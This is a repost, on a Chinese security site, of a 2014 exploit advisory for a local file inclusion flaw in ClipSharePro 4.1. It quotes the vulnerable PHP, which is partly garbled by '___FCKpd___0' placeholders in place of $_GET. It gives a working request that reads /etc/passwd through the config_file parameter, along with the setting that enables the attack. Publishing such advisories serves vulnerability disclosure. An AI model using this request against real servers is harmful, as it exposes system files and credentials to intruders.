首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ClipSharePro 4.1 Local File Inclusion
来源:http://security-geeks.blogspot.com 作者:Ullah 发布时间:2014-03-11  
# Exploit Title  : ClipSharePro <= 4.1 Local File Inclusion
# Date           : 2013/3/9
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.clip-share.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

#Local File Inclusion

ClipsharePro is a paid youtube clone script , suffers from Localfile Inclusion vulnerability through 
which attacker can include arbitrary file in webapp.

LFI in ubr_link_upload.php
Poc code

if($MULTI_CONFIGS_ENABLED){
	if(isset(
___FCKpd___0
GET['config_file']) && strlen(
___FCKpd___0
GET['config_file']) > 0){ $config_file =
___FCKpd___0
GET['config_file']; } else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); } } else{ $config_file = $DEFAULT_CONFIG; } // Load config file require $config_file; //including arbitrary file
___FCKpd___0
GET['config_file'] echo $config_file; The vulnerability can be exploited as.. http://localhost/clips/ClipSharePro/ubr_link_upload.php?config_file=/etc/passwd For sucessfully exploitation of this vulnerability you need $MULTI_CONFIGS_ENABLED to be 1 in the config file.. In ubr_ini.php $MULTI_CONFIGS_ENABLED = 1; --->This value should have to be 1 #Independent Pakistani Security Researcher

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·QNX 6.x Photon Denial Of Servi
·Yokogawa CENTUM CS 3000 BKHOde
·QNX 6.x phfont Enumeration
·Yokogawa CENTUM CS 3000 BKBCop
·QNX 6.x phgrafx File Enumerati
·Oracle VirtualBox 3D Accelerat
·QNX 6.4.x/6.5.x pppoectl - Inf
·QNX 6.5.0 x86 phfont - Local r
·QNX 6.5.0 x86 io-graphics - Lo
·Ruby Gem Arabic Prawn 0.0.1 Co
·QNX 6.4.x/6.5.x ifwatchd - Loc
·Zoo 2.10 - Parse.c Local Buffe
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved